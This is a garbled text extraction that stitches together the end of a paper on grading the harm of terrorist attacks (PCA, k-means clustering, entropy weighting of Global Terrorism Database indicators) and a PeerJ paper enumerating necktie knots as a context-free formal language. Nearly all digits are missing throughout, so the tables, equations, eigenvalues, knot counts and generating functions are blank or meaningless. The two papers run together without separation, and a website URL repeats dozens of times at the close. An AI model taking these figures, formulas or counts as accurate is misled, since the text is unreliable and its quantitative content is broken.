n-dimensional matrices. according to the order of pca eigenvalues from large to small, we select the corresponding first m eigenvectors., and then obtain an n*m feature transformation matrix t. in this paper, n= , m= . the dimensionality reduction is completed.[ ] the order of pca eigenvalues generated by indicators from large to small is shown in table . table iii. characteristic values corresponding to the indicators indicators characteristic values nkill . e- nwound . e- targtype . e- country . e- attacktype . e- region . e- suicide . e+ city . e- longitude . e+ extended . e+ latitude . e+ propextent . e- success . e+ weapontype . e+ in this paper, data is reduced by the pca algorithm, i.e. the original -dimensional matrix    x = x ,x ,x ,x ,x ,x ,x ,x ,x ,x ,x ,x ,x ,x is reduced to a - dimensional matrix y = y ,y ,y ,y   . the corresponding contribution degrees of the -dimensional feature vectors are: . , . , . , . , and the sum is greater than . . therefore, the dimension-reduced matrix preserves most of the original data and can be directly used for clustering. b. using k-means algorithm for hazard classification the main idea of the k-means clustering algorithm is to cluster a number of discrete data points with k centroids and divide them into k clusters to distinguish data points with less similarity. sum of the squared error (sse) is the objective function of clustering, and classify data points with similar similarity into one class. the method finally converges to the optimal solution by continuously updating the centroid attribution and centroid position of the data points[ ]. the algorithm process is as follows: ) we select event objects as the initial cluster center. ) we calculate the euclidean distance from each event to each cluster center and assign this event to the nearest cluster. ) after all the event assignments are completed, the five cluster centers are recalculated, and compared with the cluster center obtained in the previous calculation. if the cluster center changes, the euclidean distance and the assigned category are recalculated. international journal of advanced network, monitoring and controls volume , no. , ) when the cluster center does not change, the clustering result is directly output. calculate the cluster center to which each type of event belongs, as shown in table . table iv. table . clustering center for event classification type x x x x numbers . - . - . . - . . - . . . . . - . . - . . - . - . . . - . the formula for calculating each event category is as shown in equations ( ) to ( ).         ( . ) ( . ) ( . ) ( . )d y y y y            ( . ) ( . ) ( . ) ( . )d y y y y           ( . ) ( . ) ( . ) ( . )d y y y y   ( . ) ( . ) ( . ) ( . )d y y y y                   ( . ) ( . ) ( . ) ( . )d y y y y    i min min{d ,d ,d ,d ,d }   among them is y = y ,y ,y ,y   the feature component vector after dimension reduction by pca algorithm. di is the euclidean distance between the dimension vector and the five cluster centers. mini is the minimum euclidean distance, and i is the final event category. c. using entropy method for calculating weight coefficient the entropy method is a mathematical method used to determine the degree of dispersion of an indicator. with the great degree of dispersion comes great impact of the comprehensive evaluation of the indicator. the entropy value can be used to determine the degree of dispersion of an indicator. the steps of calculating the weight coefficient by the entropy method are as follows: ) we select indicators of events, and use xij to indicate the index value of the i-th indicator in the j-th terrorist attack. );;( n ,, ; ,, i  mj  ) normalization of indicators is normalized processing. the absolute values of the indicators are conversed into relative values. it has different representative meanings that the positive indicator and the negative indicator value (the higher the positive indicator value is the better), the lower the negative indicator value is the better), as shown in equation ( ) and equation ( ).     ' min{ ,... } max{ ,..., } min{ ,..., } ij ij nj ij j nj j nj x x x x x x x x       ' max{ ,... } max{ ,..., } min{ ,..., } j nj ij ij j nj j nj x x x x x x x x   ) calculating the proportion of the i-th event in the j-th index are shown in equation .     n i ij ij ij x x p   ) calculating the entropy value of the j-th indicator, are shown in equation .  )nln(/ k ),ln(e     j n i ijijj eppk   ) calculating the information entropy redundancy are shown in equation .  jj e d   ) calculating the weights of each indicator are shown in equation .     m j j j j d d w   ) calculating the hazard weighting value of each event are shown in equation . international journal of advanced network, monitoring and controls volume , no. ,      m j iji w j xs   the weighting factors for each indicator are shown in table . table v. table . weight coefficients of each indicator indicator x x x x x x x weight . . . . . . . indicator x x x x x x x weight . . . . . . . d. hazard grading result all events can be divided into five hazard levels by pca and k-means clustering. the hazard score of each event is obtained by entropy method, and the average value of the hazard score of each type of event is obtained. after sorting the average, the five hazard levels are shown in table . table vi. table . hazard grading result hazard level cluster category hazard level . . . - . - . iv. conclusion in this paper, categories related to hazard are selected from the global terrorism database (gtd) for the hazard grading of terrorist attacks; after pre- processing the data used, through principal component analysis (pca) the related data is used for feature extraction. the k-means clustering method aggregates all events into five categories. the entropy method calculates the weight coefficient of each indicator, and finally obtains the comprehensive score of the harm of each type of attack. according to the comprehensive scores of the five types of attacks, a graded to five- level classification model was obtained. this model quantifies the relevant data of past terrorist attacks, and the obtained model has objectivity. it is necessary to establish more detailed grading standards. reference [ ] sanjun nie. research on counter-terrorism based on big data[a]. ieee beijing section. proceedings of ieee international conference on big data analysis (icbda) [c]. ieee beijing section: ieee beijing section institute of electrical engineers beijing branch), : . [ ] strang, kenneth david & sun, zhaohao. ( ). analyzing relationships in terrorism big data using hadoop and statistics. journal of computer information systems. . - . . / . . .k. elissa, “title of paper if known,” unpublished. [ ] li wei. characteristics and trends of current international terror and anti-terrorism struggle [j]. modern international relations, ( ): - . [ ] yu yihan, fu wei, wu xiaoping. privacy data metric and hierarchical model based on shannon information entropy and bp neural network[j].journal of communications, , ( ) [ ] he jing. research and analysis of future anti-terrorism situation based on big data[j]. economic research guide, ( ): - . [ ] wang qi, li xiaopei, dong xinyan. classification model of wine grape based on principal component analysis[j]. china high-tech zone, ( ): . [ ] wang chao, yao min, fu zhanzhan. research on emergency classification based on fuzzy comprehensive evaluation[j].software guide, ( ): - [ ] lu ronghui. terrorism and counter-terrorism in the context of globalization [d]. suzhou university, . [ ] wang chao, yao min, fu zhanzhan. research on emergency classification based on fuzzy comprehensive evaluation[j].software guide, , ( ): - . [ ] hou wenjing, jiang xinxin, wen hong, lei wenxin, xu aidong. terminal security level grading model of bp neural network based on edge side[j].communication technology, , ( ): - . [ ] shi ya, wang xiuhua, yang wei, liu li, tan zhezhen, ouyang wei. study on the grading strategy of comprehensive evaluation model for long-term care of the elderly[j]. chinese journal of nursing, , ( ): - more ties than we thought submitted february accepted may published may corresponding author mikael vejdemo-johansson, mvj@kth.se academic editor anne bergeron additional information and declarations can be found on page doi . /peerj-cs. copyright hirsch et al. distributed under creative commons cc-by . open access more ties than we thought dan hirsch , ingemar markström , meredith l. patterson , anders sandberg and mikael vejdemo-johansson , , upstanding hackers inc. kth royal institute of technology, stockholm, sweden oxford university, uk jožef štefan institute, ljubljana, slovenia institute for mathematics and its applications, minneapolis, usa abstract we extend the existing enumeration of neck tie-knots to include tie-knots with a textured front, tied with the narrow end of a tie. these tie-knots have gained popularity in recent years, based on reconstructions of a costume detail from the matrix reloaded, and are explicitly ruled out in the enumeration by fink & mao ( ). we show that the relaxed tie-knot description language that comprehensively describes these extended tie-knot classes is context free. it has a regular sub-language that covers all the knots that originally inspired the work. from the full language, we enumerate , distinct tie-knots that seem tie-able with a normal neck-tie. out of these , , we also enumerate , tie-knots that belong to the regular sub-language. subjects algorithms and analysis of algorithms, computational linguistics, theory and formal methods keywords necktie knots, formal language, automata, chomsky hierarchy, generating functions introduction there are several different ways to tie a necktie (fig. ). classically, knots such as the four-in-hand, the half windsor and the full windsor have commonly been taught to new tie-wearers. in a sequence of papers and a book, fink & mao ( ), fink & mao ( ) and fink & mao ( ) defined a formal language for describing tie-knots, encoding the topology and geometry of the knot tying process into the formal language, and then used this language to enumerate all tie-knots that could reasonably be tied with a normal-sized necktie. the enumeration of fink and mao crucially depends on dictating a particular finishing sequence for tie-knots: a finishing sequence that forces the front of the knot—the façade—to be a flat stretch of fabric. with this assumption in place, fink and mao produce a list of distinct tie-knots, and determine several novel knots that extend the previously commonly known list of tie-knots. in recent years, however, interest has been growing for a new approach to tie-knots. in the matrix reloaded (wachowski et al., ), the character of “the merovingian” has a sequence of particularly fancy tie-knots. attempts by fans of the movie to recreate the tie-knots from the merovingian have led to a collection of new tie-knot inventions, all of which rely on tying the tie with the thin end of the tie—the thin blade. doing this allows for how to cite this article hirsch et al. ( ), more ties than we thought. peerj comput. sci. :e ; doi . /peerj-cs. mailto:mvj@kth.se https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure some specific tie-knot examples. top row from left: the trinity (l- . ), the eldredge (l- . ) and the balthus (c- . , the largest knot listed by fink and mao). bottom row randomly drawn knots. from left: l- . , l- . , r- . . a knot with textures or stylings of the front of the knot, producing symmetric and pleasing patterns. knorr ( ) gives the history of the development of novel tie-knots. it starts out in when the edeity knot is published as a pdf tutorial. over the subsequent years, more and more enthusiasts involve themselves, publish new approximations of the merovingian tie-knot as pdf files or youtube videos. by , the new tie-knots are featured on the website lifehacker and go viral. in this paper, we present a radical simplification of the formal language proposed by fink and mao, together with an analysis of the asymptotic complexity class of the tie-knots language. we produce a novel enumeration of necktie-knots tied with the thin blade, and compare it to the results of fink and mao. formal languages the work in this paper relies heavily on the language of formal languages, as used in theoretical computer science and in mathematical linguistics. for a comprehensive reference, we recommend the textbook by sipser ( ). recall that given a finite set l called an alphabet, the set of all sequences of any length of items drawn (with replacement) from l is denoted by l∗. a formal language on the alphabet l is some subset a of l∗. the complexity of the automaton required to determine whether a sequence is an element of a places a in one of several complexity classes. languages that are described by finite state automata are regular; languages that require a pushdown automaton are context free; languages that require a linear bounded automaton are context sensitive and languages that require a full turing machine to determine are called recursively enumerable. this sequence builds an increasing hierarchy of expressibility and computational complexity for syntactic rules for strings of some arbitrary sort of tokens. hirsch et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. l r c t w thin blade broad blade ba figure left/center/right. the parts of a necktie, and the division of the wearer’s torso with the regions (left, center right) and the winding directions (turnwise, widdershins) marked out for reference. one way to describe a language is to give a grammar—a set of production rules that decompose some form of abstract tokens into sequences of abstract or concrete tokens, ending with a sequence of elements in some alphabet. the standard notation for such grammars is the backus–naur form, which uses ::= to denote the production rules and ⟨some name⟩ to denote the abstract tokens. further common symbols are ∗, the kleene star, that denotes an arbitrary number of repetitions of the previous token (or group in brackets), and |, denoting a choice of one of the adjoining options. the anatomy of a necktie in the following, we will often refer to various parts and constructions with a necktie. we call the ends of a necktie blades, and distinguish between the broad blade and the thin blade —see fig. for these names. the tie-knot can be divided up into a body, consisting of there are neckties without a width difference between the ends. we ignore this distinction for this paper. all the twists and turns that are not directly visible in the final knot, and a façade, consisting of the parts of the tie actually visible in the end. in fig. we demonstrate this distinction. the body builds up the overall shape of the tie-knot, while the façade gives texture to the front of the knot. the enumeration of fink and mao only considers knots with trivial façades, while these later inventions all consider more interesting façades. as a knot is in place around a wearer, the y-shape of the tie divides the torso into regions: left, center and right—as shown to the right in fig. . a tie-knot has to be tied by winding and tucking one of the two blades around the other: if both blades are active, then the tie can no longer be adjusted in place for a comfortable fit. we shall refer to the blade used in tying the knot as the leading blade or the active blade. each time the active blade is moved across the tie-knot—in front or in back—we call the part of the tie laid on top of the knot a bow. a language for tie-knots fink & mao ( ) observe that once the first crossing has been made, the wrapping sequence of a classical tie-knot is completely decided by the sequence of regions into which the broad blade is moved. adorning the region specifications with a direction—is the tie moving away from the wearer or towards the wearer—they establish a formal alphabet for describing tie-knots with symbols. we reproduce their construction here, using u for the hirsch et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure different examples of tie knots. left, a -in-hand; middle, a double windsor; right a trinity. the -in-hand and double windsor share the flat façade but have different bodies producing different shapes. the trinity has a completely different façade, produced by a different wind and tuck pattern. move to tuck the blade u nder the tie itself. the notation proposed by fink & mao ( ) fink and mao used t for tuck. interprets repetitions u k of u as tucking the blade k bows under the top. it turns out that the complexity analysis is far simpler if we instead write u k for tucking the blade under the bow that was produced k windings ago. this produces a language on the alphabet: {l⊗,l⊙,c⊗,c⊙,r⊗,r⊙,u} they then introduce relations and restrictions on these symbols: t ie no region (l,c,r) shall repeat: after an l only c or r are valid next regions. u moves do not influence this. t ie no direction (⊙—out of the paper, ⊗—in towards the paper) shall repeat: after an outwards move, the next one must go inwards. u moves do not influence this. t ie tucks (u ) are valid after an outward move. t ie a tie-knot can end only on one of c⊗,c⊙ or u . in fact, almost all classical knots end on u . the exemption here being the onassis style knot, favored by the eponymous shipping magnate, where after a classical knot the broad blade is brought up with a c⊙ move to fall in front of the knot, hiding the knot completely. t ie a k-fold tuck u k is only valid after at least k preceding moves. fink & mao ( ) do not pay much attention to the conditions on k-fold tucks, since these show up in their enumeration as stylistic variations, exclusively at the end of a knot. this collection of rules allow us to drastically shrink the tie language, both in alphabet and axioms. fink & mao are careful to annotate whether tie-knot moves go outwards or inwards at any given point. we note that the inwards/outwards distinction follows as a direct consequence of axioms t ie , t ie and t ie . since non-tuck moves must alternate between inwards and outwards, and the last non-tuck move must be outwards, the orientation of any sequence of moves follows by backtracking from the end of the string. hence, when faced with a non-annotated string like rclcrclcrclrurclu hirsch et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. we can immediately trace from the tail of the knot string: the last move before the final tuck must be outwards, so that l must be a l⊙. so it must be preceded by r⊙c⊗. tracing backwards, we can specify the entire string above to r⊗c⊙l⊗c⊙r⊗c⊙l⊗c⊙r⊗c⊙l⊗r⊙uc⊗r⊙c⊗l⊙u next, the axiom t ie means that a sequence will not contain either of lu∗l,cu∗c,ru∗r as subsequences. hence, the listing of regions is less important than the direction of recall that the kleene star f∗ is used to denote sequences of or more repetitions of the string f. transition: any valid transition is going to go either clockwise or counterclockwise. say, as seen on the mirror image. changing this convention does not change the count, as long as the change is consequently done. writing t for clockwise and w for counterclockwise, we can give a strongly reduced t for turnwise. w for widdershins. tie language on the alphabet t, w, u. to completely determine a tie-knot, the sequence needs a starting state: an annotation on whether the first crossing of a tie-knot goes across to the right or to the left. in such a sequence, a u instruction must be followed by either t or w dictating which direction the winding continues after the tuck, unless it is the last move of the tie: in this case, the blade is assumed to continue straight ahead—down in front for most broad-blade tie-knots, tucked in under the collar for most thin-blade knots. the position of the leading blade after a sequence of w/t windings is a direct result of #w − #t(mod ). this observation allows us to gain control over several conditions determining whether a distribution of u symbols over a sequence of w/t produces a physically viable tie-knot. theorem . a position in a winding sequence is valid for a k-fold tuck if the sub-sequence of the last k w or t symbols is such that either . starts with w and satisfies #w − #t = (mod ) . starts with t and satisfies #t − #w = (mod ). proof. the initial symbol produces the bow under which the tuck will go. if the initial symbol goes, say, from r to l, then the tuck move needs to come from c in order to go under the bow. in general, a tuck needs to come from the one region not involved in the covering bow. every other bow goes in front of the knot, and the others go behind the knot. hence, there are k − additional winding symbols until the active blade returns to the right side of the knot. during these k − symbols, we need to transition one more step around the sequence of regions. the transitions w and t are generator and inverse for the cyclic group of order , concluding the proof. � it is worth noticing here that a particular point along a winding can be simultaneously valid for both a k-fold and an m-fold tuck for k ≠ m. one example would be in the winding string twtt: ending with tt, it is a valid site for a -fold tuck producing twttu, and since twtt starts with t and has more t than w, it is also a valid site for a -fold tuck producing twttuu. we will revisit this example below, in ‘recursive tucks.’ we may notice that with the usual physical constraints on a tie—where we have experimentally established that broad blade ties tend to be bounded by moves, and thin blade ties by moves, we can expect that no meaningful tuck deeper than will ever hirsch et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. be relevant; for the broad blade ties. the bound of is achieved in the enumeration by fink & mao ( ). in our enumeration, we will for the sake of comfort focus on ties up to moves. language complexity in this section, we examine the complexity features of the tie-knot language. due to the constraints we have already observed on the cardinality of w and t, we will define a grammar for this language. we will write this grammar with a backus–naur form. although in practice it is only possible to realise finite strings in the tie-knot language due to the physical properties of fabric, we assume an arbitrarily long (but finite), infinitely thin tie. single-depth tucks the classical fink and mao system has a regular grammar, given by ⟨tie⟩ ::= l⟨l⟩ ⟨lastr⟩ ::= l⟨lastl⟩ | c⟨lastc⟩ | lcu ⟨lastl⟩ ::= r⟨lastr⟩ | c⟨lastc⟩ | rcu ⟨lastc⟩ ::= l⟨lastl⟩ | r⟨lastr⟩ we use the symbol ⟨lastr⟩ to denote the rule that describes what can happen when the last move seen was an r. hence, at any step in the grammar, some tie knot symbol is emitted, and the grammar continues from the state that symbol was the last symbol emitted. the above grammar works well if the only tucks to appear are at the end. for intermediate tucks, and to avoid tucks to be placed at the back of the knot (obeying t ie ), we would need to keep track of winding parity: tucks are only valid an even number of winding steps from the end. we can describe this with a regular grammar. for the full tie-knot language, the grammar will end up context-free, as we will see in ‘recursive tucks.’ ⟨tie⟩ ::= ⟨prefix⟩(⟨pair⟩ | ⟨tuck⟩) ∗ ⟨tuck⟩ ⟨prefix⟩ ::= t | w | ϵ ⟨pair⟩ ::= (t|w)(t|w) ⟨tuck⟩ ::= ttu | wwu the distribution of t and w varies by type of knot: for classical knots, #w − #t = (mod ); for modern knots that tuck to the right, #w − #t = (mod ); and for modern knots that tuck to the left, #w − #t = (mod ). this grammar does not discriminate between these three sub-classes. in order to track these sub-classes, the rlc-notation is easier. in order to rebuild this grammar to one based on the rlc-notation, note that from l a t takes us to c and a w takes us to r. so from a ⟨lastt⟩ residing at l, we have the options: w to hirsch et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. r, t to c, or tu to c. in particular, there is a ⟨lastt⟩ at l if we arrived from r. hence, the tu option can be seen as being a ttu option executing from the preceding r state. there is thus, at any given position in the tie sequence, the options of proceeding with a t or a w, or to proceed with one of ttu or wwu. in the latter two cases, we can also accept the string. starting at l, these options take us—in order—to c, to r, to cru and to rcu respectively. this observation extends by symmetry to all stages, giving the grammar below. ⟨lastr⟩ ::= lr⟨lastr⟩ | cr⟨lastr⟩ | lc⟨lastc⟩ | cl⟨lastl⟩ | lcu[⟨lastc⟩] | clu[⟨lastl⟩] ⟨lastl⟩ ::= rl⟨lastl⟩ | cl⟨lastl⟩ | rc⟨lastc⟩ | cr⟨lastr⟩ | rcu[⟨lastc⟩] | cru[⟨lastr⟩] ⟨lastc⟩ ::= lc⟨lastc⟩ | rc⟨lastc⟩ | lr⟨lastr⟩ | rl⟨lastl⟩ | lru[⟨lastr⟩] | rlu[⟨lastl⟩] ⟨tie⟩ ::= l(⟨lastl⟩ | r⟨lastr⟩ | c⟨lastc⟩) by excluding some the exit rules, this allows us to enumerate novel tie-knots with a specific ending direction, which will be of interest later on. recursive tucks we can write a context-free grammar for the arbitrary depth tuck tie-knots. ⟨tie⟩ ::= ⟨prefix⟩(⟨pair⟩ | ⟨tuck⟩) ∗ ⟨tuck⟩ ⟨prefix⟩ ::= t | w | ϵ ⟨pair⟩ ::= (t|w)(t|w) ⟨tuck⟩ ::= ⟨ttuck ⟩ | ⟨wtuck ⟩ ⟨ttuck ⟩ ::= tt⟨w ⟩u | tw⟨w ⟩u ⟨wtuck ⟩ ::= ww⟨w ⟩u | wt⟨w ⟩u ⟨w ⟩ ::= ww⟨w ⟩u | wt⟨w ⟩u | tw⟨w ⟩u|tt⟨w ⟩u | ⟨ttuck ⟩’⟨w ⟩u | ⟨wtuck ⟩’⟨w ⟩u | ϵ ⟨w ⟩ ::= ww⟨w ⟩u | wt⟨w ⟩u | tw⟨w ⟩u|tt⟨w ⟩u | ⟨ttuck ⟩’⟨w ⟩u | ⟨wtuck ⟩’⟨w ⟩u ⟨w ⟩ ::= ww⟨w ⟩u | wt⟨w ⟩u | tw⟨w ⟩u|tt⟨w ⟩u | ⟨ttuck ⟩’⟨w ⟩u | ⟨wtuck ⟩’⟨w ⟩u note that the validity of a tuck depends only on the count of t and w in the entire sequence comprising the tuck, and not the validity of any tucks recursively embedded into it. for instance, twtt is a valid depth- -tuckable sequence, as is its embedded depth- -tuckable sequence tt. however, ttwt is also a valid depth- -tuckable sequence, even though wt is not a valid depth- -tuckable sequence. we introduce the symbol ’ to delineate different tucks that may come in immediate sequence, such as happens in the tie knot twttu’uu. hirsch et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. classification of the tie-knot language if we limit our attention to only the single-depth tie-knots described in ‘single-depth tucks,’ then the grammar is regular, proving that this tie language is a regular language and can be described by a finite automaton. in particular this implies that the tie-knot language proposed by fink & mao ( ) is regular. in fact, an automaton accepting these tie-knots is given by: after the prefix, execution originates at the middle node, but has to go outside and return before the machine will accept input. this maintains the even length conditions required by t ie . as for the deeper tucked language in ‘recursive tucks’, the grammar we gave shows it to be at most context-free. whether it is exactly context-free requires us to exclude the existence of a regular grammar. theorem . the deeper tucked language is context-free. proof. our grammar in ‘recursive tucks’ already shows that the language for deeper tucked tie-knots is either regular or context-free: it produces tie-knot strings with only single non-terminal symbols to the left of each production rule. it remains to show that this language cannot be regular. to do this, we use the pumping lemma for regular languages. recall that the pumping lemma states that for every regular language there is a constant p such that for any word w of length at least p, there is a decomposition w = xyz such that |xy| ≤ p, |y| ≥ and xyiz is a valid string for all i > . since the reverse of any regular language is also regular, the pumping lemma has an alternative statement that requires |yz| ≤ p instead. we shall be using this next. suppose there is such a p. consider the tie-knot ttw q− u q for some q > p/ . any decomposition such that |yz| ≤ p will be such that y and z consist of only u symbols. in particular y consists of only u symbols. hence, for sufficiently large values of i, there are too few preceding t/w-symbols to admit that tuck depth. hence the language is not regular. � hirsch et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. enumeration we can cut down the enumeration work by using some apparent symmetries. without loss of generality, we can assume that a tie-knot starts by putting the active blade in region r: any knot starting in the region l is the mirror image of a knot that starts in r and swaps all w to t and vice versa. generating functions generating functions have proven a powerful method for enumerative combinatorics. one very good overview of the field is provided by the textbooks by stanley ( ) and stanley ( ). their relevance to formal languages is based on a paper by chomsky & schützenberger ( ) that studied context-free grammars using formal power series. more details will appear in the (yet unpublished) handbook automatha (gruber, lee & shallit, ). a generating function for a series an of numbers is a formal power series a(z) = ∞ j= ajz j such that the coefficient of the degree k term is precisely ak. where ak and bk are counts of “things of size k” of type a or b respectively, the sum of the corresponding generating functions is the count of “things of size k” across both categories. if gluing some thing of type a with size j to some thing of type b with size k produces a thing of size j + k, then the product of the generating functions measures the counts of things you get by gluing things together between the two types. for our necktie-knot grammars, the sizes are the winding lengths of the ties, and it is clearly the case that adding a new symbol extends the size (thus is a multiplication action), and taking either one or another rule extends the items considered (thus is an additive action). the maple package combstruct has built-in functions for computing a generating maple is a trademark of waterloo maple inc. the computations of generating functions in this paper were performed by using maple. function from a grammar specification. using this, and the grammars we state in ‘single-depth tucks,’ we are able to compute generating functions for both the winding counts and the necktie counts for both fink and mao’s setting and the single-depth tuck setting. • the generating function for fink and mao necktie-knots is z ( + z)( − z) = z + z + z + z + z + z + z + o(z ). • the generating function for single tuck necktie-knots is z ( z + ) − z = z + z + z + z + z + z + z + z + , z + , z + , z + o(z ). • by removing final states from the bnf grammar, we can compute corresponding generating functions for each of the final tuck destinations. for an r-final tuck, we remove all final states except for cru and lru, making the non-terminal symbol mandatory for all other tuck sequences. for l, we remove all hirsch et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. but clu and rlu. for c, we remove all but rcu and lcu. this results in the following generating functions for r-final, l-final and c-final sequences, respectively. z ( z − z + z + ) − z = z + z + z + z + z + z + z + z + z + , z + , z + o(z ) z ( z − z − ) − z = z + z + z + z + z + z + z + z + , z + , z + o(z ) z ( z − z + z + ) − z = z + z + z + z + z + z + z + z + z + , z + , z + o(z ). • removing the references to the tuck move, we recover generating functions for the number of windings available for each tie length. we give these for r-final, l-final and c-final respectively. summed up, these simply enumerate all possible t/w-strings of the corresponding lengths, and so run through powers of . z − z − z = z + z + z + z + z + z + z + z + z + z + z + o(z ) z ( − z)( + z) = z + z + z + z + z + z + z + z + z + z + o(z ) z − z − z = z + z + z + z + z + z + z + z + z + z + z + o(z ). • for the full grammar of arbitrary depth knots, we set w to be a root of ( z − z )ζ + (− z + z − z )ζ + (− z + z − z + )ζ − z + z − = solved for ζ . then the generating function for this grammar is: − z − z +  w z − wz + w z − wz − z w + z w − w z − z + wz + w z − z − wz + w z + z − z w + z + zw − z + w −  = z + z + z + z + z + z + , z + , z + , z + , z + , z + , z + , , z + o(z ). tables of counts for ease of reading, we extract the results from the generating functions above to more easy-to-reference tables here. winding length throughout refers to the number of r/l/c symbols occurring, and thus is larger than the w/t count. the cases enumerated by fink & mao ( ) are hirsch et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. winding length total # tie-knots a knot with the thick blade active will cover up the entire knot with each new bow. as such, all thick blade active tie-knots will fall within the classification by fink & mao ( ). the modern case, thus, deals with thin blade active knots. as evidenced by the trinity and the eldredge knots, thin blade knots have a wider range of interesting façades and of interesting tuck patterns. for thick blade knots, it was enough to assume that the tuck happens last, and from the c region, the thin blade knots have a far wider variety. the case remains that unless the last move is a tuck—or possibly finishes in the c region—the knot will unravel from gravity. we can thus expect this to be a valid require- ment for the enumeration. there are often more valid tuck sites than the final position in a knot, and the tuck need no longer come from the c region: r and l are at least as valid. the computations in ‘generating functions’ establish winding length total # left windings , # right windings , # center windings , # left knots , , , # right knots , , , # center knots , , , # single tuck knots , , , , total # knots , , , , , , the first point where the singly tucked knots and the full range of knots deviate is at the knots with winding length ; there are singly tucked knots, and knots that allow for a double tuck, namely: ttttu ttwwu twttu twwwu wtttu wtwwu wwttu wwwwu ttuttu ttuwwu wwuttu wwuwwu tttwuu ttwtuu twttuu twttu’uu wtwwuu wtwwu’uu wwtwuu wwwtuu the reason for the similarity between the right and the center counts is that the winding sequences can be mirrored. left-directed knots are different since the direction corresponds to the starting direction. hence, a winding sequence for a center tuck can be mirrored to a winding sequence for a right tuck. in the preprint version of this paper, we claimed the total count of knots using only single-depth tucks to be , . during the revision of the paper, we have discovered two errors in this claim: hirsch et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. . there is an off-by-one error in this count. . this count was done for tie-knots that allow tucks that are hidden behind the knot. adding this extra space to the generating grammar produces the generating function z + z + z + z + z + z + , z + , z + , z + , z + , z + o(z ) with a total of , tie-knots with up to moves. aesthetics fink & mao ( ) propose several measures to quantify the aesthetic qualities of a necktie-knot; notably symmetry and balance, corresponding to the quantities #r − #l and the number of transitions from a streak of w to a streak of t or vice versa. by considering the popular thin-blade neck tie-knots: the eldredge and the trinity, as described in krasny ( a) and krasny ( b), we can immediately note that balance no longer seems to be as important for the look of a tie-knot as is the shape of its façade. symmetry still plays an important role in knots, and is easy to calculate using the clr notation for tie-knots. knot tw-string clr-string balance symmetry eldredge tttwwttuttwwu lcrlrcrlucrclu trinity twwwtttuttu lclrcrlcurlu we do not in this paper attempt to optimize any numeric measures of aesthetics, as this would require us to have a formal and quantifiable measure of the knot façades. this seems difficult with our currently available tools. conclusion in this paper, we have extended the enumeration methods originally used by fink & mao ( ) to provide a larger enumeration of necktie-knots, including those knots tied with the thin blade of a necktie to produce ornate patterns in the knot façade. we have found , winding patterns that take up to moves to tie and are anchored by a final single depth tuck, and thus are reasonable candidates for use with a normal necktie. we chose the number of moves by examining popular thin-blade tie-knots—the eldredge tie-knot uses moves—and by experimentation with our own neckties. most of these winding patterns allow several possible tuck patterns, and thus the , winding patterns give rise to , singly tucked tie-knots. we have further shown that in the limit, the language describing neck tie-knots is context free, with a regular sub-language describing these , knots. these counts, as well as the stated generating functions, are dependent on the correctness of the combstruct package in maple, and the correctness of our encoding of these grammars as maple code. we have checked the small counts and generated strings hirsch et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. for each of the grammars against experiments with a necktie and with the results by fink and mao and our own catalogue. questions that remain open include: • find a way to algorithmically divide a knot description string into a body/façade distinction. • using such a distinction, classify all possible knot façades with reasonably short necktie lengths. we have created a web-site that samples tie-knots from knots with at most moves and displays tying instructions: http://tieknots.johanssons.org. the entire website has also been deposited with figshare (vejdemo-johansson, ). all the code we have used, as well as a table with assigned names for the , winding patterns for up to moves are provided as supplemental information to this paper. winding pattern names start with r, l or c depending on the direction of the final tuck, and then an index number within this direction. we suggest augmenting this with the bit-pattern describing which internal tucks have been added—so that e.g., the eldredge would be l- . (including only the rd potential tuck from the start) and the trinity would be l- . (including only the nd potential tuck). thus, any single-depth tuck can be concisely addressed. acknowledgements we would like to thank the reviewers, whose comments have gone a long way to make this a far better paper, and who have caught several errors that marred not only the presentation but also the content of this paper. reviewer suggested a significant simplification of the full grammar in ‘recursive tucks,’ which made the last generating function at all computable in reasonable time and memory. reviewer suggested we look into generating functions as a method for enumerations. as can be seen in ‘generating functions,’ this suggestion has vastly improved both the power and ease of most of the results and calculations we provide in the paper. for these suggestions in particular and all other suggestions in general we are thankful to both reviewers. additional information and declarations funding mvj was partially supported for this work by the th framework programme through the project toposys (fp -ict- -strep). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: th framework programme: fp -ict- -strep. hirsch et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org 